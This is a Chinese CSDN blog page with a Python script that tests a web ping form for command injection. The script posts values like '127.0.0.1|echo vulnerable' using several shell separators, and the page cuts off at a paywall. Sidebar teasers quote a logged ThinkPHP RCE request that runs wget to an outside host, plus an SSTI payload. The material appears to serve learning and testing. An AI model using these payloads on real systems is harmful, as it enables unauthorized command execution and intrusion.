python——脚本实现检测目标ip是否存在rce漏洞

已于 2022-02-09 16:06:14 修改
阅读量1.5k 收藏
点赞数 3
CC 4.0 BY-SA版权
分类专栏: python每日一练 漏洞挖掘 文章标签: python tcp/ip 安全
于 2022-01-24 21:36:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-NC-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/xiaofengdada/article/details/122675517
这篇博客介绍如何使用Python脚本来检测目标IP是否存在远程命令执行(RCE)漏洞,涉及TCP/IP通信和安全检查。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

python爬虫——request模块(一)_xiaofengdada的博客-优快云博客_python request

python——正则表达式(一)_xiaofengdada的博客-优快云博客

代码如下:

import re
import requests
url = input("请输入你需要查询的网址:")
header = {
'Cookie':'PHPSESSID=tsvp6h1gsr4g89p03ptggmtu2i'
}
symbol = ['|','||','&','&&']
for i in symbol:
    #print(i)
    ip = '127.0.0.1' + i + 'echo vulnerable'
    data = {
        'ipaddress':ip,
        'submit': '"ping"'
    }
    res = requests.post(url=url,headers
了解本专栏 订阅专栏 解锁全文 超级会员免费看
CVE-2020-16898 —— Windows TCP/IP远程执行代码漏洞
战神/calmness的博客
12-09 501
CVE-2020-16898 | Windows TCP/IP远程执行代码漏洞 发布时间:2020年10月13日MITER CVE-2020-16898 1、描述 Windows TCP / IP堆栈不正确地处理ICMPv6路由器播发数据包时,存在一个远程执行代码漏洞。成功利用此漏洞的攻击者可以获得在目标服务器或客户端上执行代码的能力。 要利用此漏洞,攻击者必须将特制的ICMPv6路由器广告数据包发送到远程Windows计算机。 2、环境 3、过程 4、修复建议 ...
禅道项目管理系统RCE漏洞复现+利用
热门推荐
0xSec
02-01 2万+
2023年1月6日,互联网披露其旧版本中存在权限绕过与命令执行漏洞,攻击者可在无需登录的情况下构造恶意请求执行任意命令,控制服务器。
Python-通过Redis和CSRF获取RCE的一个示例
08-10
通过Redis和CSRF获取RCE的一个示例
Python安全脚本RCE反弹shell
weixin_60830484的博客
03-20 663
本次基于DVWA靶场进行的一次针对简单RCE漏洞反弹shell脚本的编写
python windows系统漏洞扫描_Windows主机漏洞扫描工具
weixin_39694264的博客
12-06 342
import requestsimport sqlite3import jsonimport hashlibimport mathimport reimport threadingimport timeimport argparsefrom pathlib import Path# 删除一些ssl 认证的warnging信息requests.packages.urllib3.disable_war...
python 漏洞扫描工具_基于Python3的漏洞检测工具
weixin_39530437的博客
12-10 804
Python3 漏洞检测工具 -- lancelance, a simple version of the vulnerability detection framework based on Python3.基于Python3的简单版漏洞检测框架 -- lance可以自定义poc或exp插件,可以指定要加载的poc或exp。代码已经上传到Github :https://github.com/b...
使用python利用FTP2.3.4的笑脸漏洞
单核CPU的小朋友的博客
03-22 1458
首先FTP是一个文件传输协议,而且FTP是一种明文的传输协议,通过WIreshark抓包能够直接获取到FTP协议的传输内容。 而在FTP2.3.4版本中,当用户名中存在:)的笑脸标志时,能够直接执行系统命令。 我们如果在CTF中遇到了FTP2.3.4版本号的服务,可以使用python进行批量攻击,那我们需要编写脚本实现这个功能,同时我们最好是使用socket来实现和FTP服务的明文通信。这个过程和使用nc命令来测试网络连通性是相同的。 而在python中,利用代码如下: import time impor
Joomla 3.0.0 -3.4.6远程代码执行(RCE)漏洞复现与分析(序列化与反序列化简单理解)
不想当脚本小子的脚本小子
12-24 1006
Joomla 3.0.0 -3.4.6远程代码执行(RCE)漏洞复现与分析 一、漏洞描述 Joomla是一套内容管理系统,是使用PHP语言加上MYSQL数据库所开发的软件系统,最版本为3.9.12,官网: https://downloads.joomla.org/,漏洞位于根目录下的configuration.php,由于该CMS对函数过滤不严格,导致了远程代码执行漏洞,该漏洞可能导致服务器被入侵、信息泄露等严重风险。 代码执行漏洞也叫代码注入漏洞,指用户通过浏览器提交执行恶意脚本代码,执行恶意构造的.
DNSpooq:流行的DNS转发程序dnsmasq中的缓存中毒和RCE
05-06
RCE漏洞通常源于软件处理输入时的安全缺陷,如不适当的输入验证或内存管理错误。 标签 "Security" 明确指出这是一个与网络安全相关的问题。对于企业和个人来说,理解并防范这类威胁至关重要,因为它们可能对网络...
HTTP.sys远程执行代码漏洞验证及复现——CVE-2015-1635、MS15-034
7Riven's blog
12-07 2万+
目录 漏洞概述 漏洞环境部署 漏洞验证 漏洞利用:ms15_034 漏洞防御 漏洞概述 HTTP.sys简介 HTTP.sys是Microsoft Windows处理HTTP请求的内核驱动程序,为了优化IIS服务器性能,从IIS6.0引入,IIS服务进程依赖HTTP.sys。HTTP.sys远程代码执行漏洞实质是HTTP.sys的整数溢出漏洞 漏洞成因 远程执行代码漏洞存在于 ...
php rce,批量thinkphp5的RCE漏洞利用
weixin_30990387的博客
03-18 334
蜜罐捕获攻击212.237.14.55 - - [22/Dec/2018:13:17:50 +0800] "GET /public/index.php?s=/index/%09hink%07pp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://142.93...
phpStudy_2016-2018_RCE漏洞检测利用脚本编写
weixin_44801963的博客
09-25 610
文章目录前言一、phpStudy_2016-2018存在什么漏洞二、EXP脚本编写1.目标存活检测2.漏洞触发3.完整代码总结 前言 本章主要针对phpStudy_2016-2018_RCE 漏洞编写EXP,复现该漏洞利用过程。文中内容涉及技术仅供个人学习参考。目前恶意植入该漏洞后门的犯罪者已伏法。 关于phpStudy_2016-2018_RCE 漏洞的详细介绍参考:https:// 一、phpStudy_2016-2018存在什么漏洞 phpStudy_2016-2018中存在RCE(remote.
渗透工具xiangrikui-exp:向日葵 RCE 漏洞一键批量检测
学习、分享、交流
05-12 1100
向日葵 RCE 漏洞一键批量检测
python 3 测试无线网速编程_Python黑客实战编程--3分钟教你如何暴力破解FTP服务器口令...
weixin_39854681的博客
11-27 163
很多关注我的小伙伴在上篇文章里学习到了如何利用python去破解加密的ZIP压缩文件,感觉很有意思,就有很多小伙伴问我有没有利用python脚本实现FTP服务器口令的暴力破解,今天小编就以此篇文章内容给小伙伴们普及一下如何利用python编程脚本暴力破解ftp服务器口令!一、实验环境介绍这里我先简单提一下ftp服务器吧!我在公司的服务器上搭建了ftp服务器,可是,为了方便我开了匿名登入的设置。An...
RCE代码及命令执行(详解)
剁椒鱼头没剁椒的博客
12-20 5637
借鉴链接:https://www.cnblogs.com/networkroom/p/16395024.html当然还有很多的其他函数,可以自学百度搜索。在low级别中是接受了用户输入的IP,服务器通过操作性的不同情况执行ping命令,并且Low级别中并未对输入的内容进行过滤。在Medium级别中是对“&&”与“;”进行了过滤,那么这里可以不使用这两个破解符即可,使用别的,比如我之前提到的“|”或者“&”。在High级别中是对“| ”进行过滤了,这里不知道是作者无意间敲了一个空格还是故意的。
RCE漏洞详解及绕过总结(全面)
永不落的梦想
07-10 2万+
包括RCE漏洞的原理,常见的造成RCE漏洞的函数解析,以及限制绕过的各种姿势
命令执行(RCE)面对各种过滤,骚姿势绕过总结
HUANGXIN9898的博客
07-09 3294
RCE又称远程代码执行漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。
SSTi模板注入-02
super_m@n的博客
04-10 565
1.先贴一个利用该漏洞RCE的例子 http://127.0.0.1:5000/?key={{%27%27.__class__.__mro__[1].__subclasses__()[128].__init__.__globals__[%27popen%27](%27dir%27).read()}} 为什么在key里面输入''.__class__那一长串的代码会执行dir命令并且把本地的目录遍历出来呢?下面就详细说说 2.在python中,object类是Python中所有类的基类,如果定义一个
针对PhpStudy-RCE漏洞EXP的编写(python
认真走好每一小步
07-22 311
有问题可以随时进行探讨哦!!!
pikachu RCE
最新发布
03-17
相比上一环节更加复杂一些,因为这里涉及到了动态解析脚本内容的功能模块 —— eval() 方法的应用场景。如果开发者滥用它,则很容易造成严重的安全隐患问题存在。 - **源代码剖析** 下面展示了一段可能存在风险...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

xiaochuhe--kaishui

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值